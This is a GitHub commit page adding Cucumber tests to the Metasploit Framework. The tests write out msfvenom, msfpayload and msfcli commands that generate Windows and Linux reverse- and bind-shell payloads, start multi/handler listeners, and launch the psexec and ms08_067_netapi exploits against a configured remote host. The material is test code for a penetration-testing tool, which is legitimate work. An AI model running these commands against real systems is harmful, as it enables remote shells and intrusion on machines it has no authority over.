Permalink
Browse files

Merge branch 'gspillman-r7-cucumber_tests'

  • Loading branch information...
sinn3r committed Jan 10, 2013
2 parents 42ea64c + 2b17a04 commit 6c2808423b5a2c47ea8c5cba50b31bc22872f4cf
@@ -0,0 +1 @@
#
@@ -0,0 +1,18 @@
#This feature contains scenarios that test the various encoders within the metasploit framework
@announce-stdout
Feature: As a Metasploit Framework user
I want to user encoders
So that I can encode various payloads I might use for attacks
Scenario: Create a windows tcp bind payload using the x86/unicode mixed encoder
When I run msfvenom to encode for windows using the "x86/unicode_mixed" encoder with "-i 1" options and a buffer register
#When I run `./msfvenom -p windows/shell/bind_tcp -e x86/unicode_mixed -i 1 BufferRegister=eax` interactively
Then the output should contain "x86/unicode_mixed succeeded with size"
Scenario: Create a windows tcp bind payload encoded with x86 alpha mixed
When I run msfvenom to encode for windows using the "x86/alpha_mixed" encoder with "-b '\x00' -i 1" options
#When I run `./msfvenom -p windows/shell/bind_tcp -e x86/alpha_mixed -b '\x00' -i 1` interactively
Then the output should contain "x86/alpha_mixed succeeded with size"
@@ -0,0 +1,19 @@
#This feature contains scenarios that test different handlers within the metasploit framework
@announce
Feature: As a MS Framework User
I want to launch various handlers
So the framework can properly handle input and output from exploits
Scenario: Launching the exploit multi handler in Check mode
When I run `./msfcli exploit/multi/handler C`
Then the output should contain "module tree"
Then the output should contain "This exploit does not support check."
Scenario: Launching the generic multi handler in Check mode
When I run `./msfcli multi/handler C`
Then the output should contain "module tree"
Then the output should contain "This exploit does not support check."
@@ -0,0 +1,24 @@
#This feature contains scenarios to test the ability to run/access payloads from the metasploit framework
Feature: I want access to Metasploit payloads
So that I can define payload options for exploits
Scenario: Verify the windows shell reverse tcp payload option in ruby
When I run msfpayload to generate a "windows/shell_reverse_tcp" on the local host
Then the output should contain "# windows/shell_reverse_tcp"
Then the output should contain "# http://www.metasploit.com"
Scenario: Verify the windows x64 shell reverse tcp payload option in ruby
When I run msfpayload to generate a "windows/x64/shell_reverse_tcp" on the local host
Then the output should contain "# windows/x64/shell_reverse_tcp"
Then the output should contain "# http://www.metasploit.com"
Scenario: Verify the linux x86 shell reverse tcp payload option in ruby
When I run msfpayload to generate a "linux/x86/shell_reverse_tcp" on the local host
Then the output should contain "# linux/x86/shell_reverse_tcp"
Then the output should contain "# http://www.metasploit.com"
Scenario: Verify the windows meterpreter reverse tcp payload can output its contents in ruby
When I run msfpayload to generate a "windows/meterpreter/reverse_tcp" on the local host
Then the output should contain "# windows/meterpreter/reverse_tcp - 290 bytes (stage 1)"
Then the output should contain "# http://www.metasploit.com"
@@ -0,0 +1,31 @@
#This is the step definition file for common framework testing steps or meta steps
When /^I run the "([^"]*)" exploit with standard target options$/ do |exploit|
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} E` interactively
}
end
When /^I run the "([^"]*)" exploit with standard target options in check mode$/ do |exploit|
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} C` interactively
}
end
When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options$/ do |encoder, options|
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options}` interactively
}
end
When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options and a buffer register$/ do |encoder, options|
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options} BufferRegister=eax` interactively
}
end
When /^I run msfpayload to generate a "([^"]*)" on the local host$/ do |payload|
steps %Q{
When I run `./msfpayload #{payload} LHOST=127.0.0.1 y`
}
end
@@ -0,0 +1,23 @@
#This is the step definition file for cucumber features relating to the framework handler feature
Given /^I launch the exploit multi handler$/ do
steps %Q{
When I run `./msfcli exploit/multi/handler E`
Then the output should contain "Please wait while we load the module tree..."
Then the output should contain "Started reverse handler on"
Then the output should contain "Starting the payload handler..."
}
end
Given /^I launch the generic multi handler$/ do
steps %Q{
When I run `./msfcli multi/handler E`
Then the output should contain "Please wait while we load the module tree..."
Then the output should contain "Started reverse handler on"
Then the output should contain "Starting the payload handler..."
}
end
@@ -0,0 +1,3 @@
# These files are to be excluded from git #
test_config.yml
@@ -0,0 +1,25 @@
#Cucumber automation environment setup class for MSF Testing
require 'cucumber'
require 'aruba/cucumber'
require_relative 'test_config'
Before do
# Automatically find the framework path
default_path = File.join(File.expand_path(File.dirname(__FILE__)), '../../../')
# Add more paths manually if needed. For example:
# "/Users/gary/rapid7/framework"
@dirs = [default_path]
@aruba_timeout_seconds = 150
end
Before('@slow_process') do
@aruba_io_wait_seconds = 150
end
@After
#after automation execution methods go here
@@ -0,0 +1,44 @@
#Test config class provides public methods or varables to use for ever test
#Includes housing data such as default web site to test, time out varaibels, etc
require 'singleton'
class TestConfig
include Singleton
def initialize(*args)
yml_path = File.join(File.dirname(__FILE__),'test_config.yml')
if File.exists?(yml_path)
@yaml_options = YAML::load(File.open(yml_path))
else
@yaml_options = {}
end
@options = {
"rhost" => "localhost",
"smbuser" => "user",
"smbpass" => "password"
}
end
def run_server
@options[:define_site].nil?
end
def method_missing(method)
if @options.has_key? method.to_s
return @options[method.to_s]
else
super
end
end
def respond_to?(method_sym, include_private = false)
if @options.include? method_s
true
else
super
end
end
end
@@ -0,0 +1,31 @@
#This feature contains scenarios that test running exploits related to microsft windows platforms
@announce-stdout
Feature: I want to launch Windows based exploits
So that I can hack Windows targets
So that I can prove how totally unsecured Windows can be
Scenario: Launch Psexec against a Windows Host
When I run the "./msfcli windows/smb/psexec" exploit with standard target options
Then the output should contain "445|WORKGROUP as user"
Then the output should contain "module tree"
Scenario: Launch PSexec in Internal Check Mode
When I run the "./msfcli windows/smb/psexec" exploit with standard target options in check mode
Then the output should contain "module tree"
Then the output should contain "This exploit does not support check."
Scenario: Launch ms08-067 in Internal Check Mode
When I run the "./msfcli windows/smb/ms08_067_netapi" exploit with standard target options in check mode
#When I run `./msfcli windows/smb/ms08_067_netapi RHOST=10.6.0.194 C` interactively
Then the output should contain "module tree"
Then the output should not contain "Check failed:"
Scenario: Launch ms08-067 against a windows remote host
When I run the "./msfcli windows/smb/ms08_067_netapi" exploit with standard target options
Then the output should contain "module tree"
Then the output should contain "Started reverse handler"

0 comments on commit 6c28084

Please sign in to comment.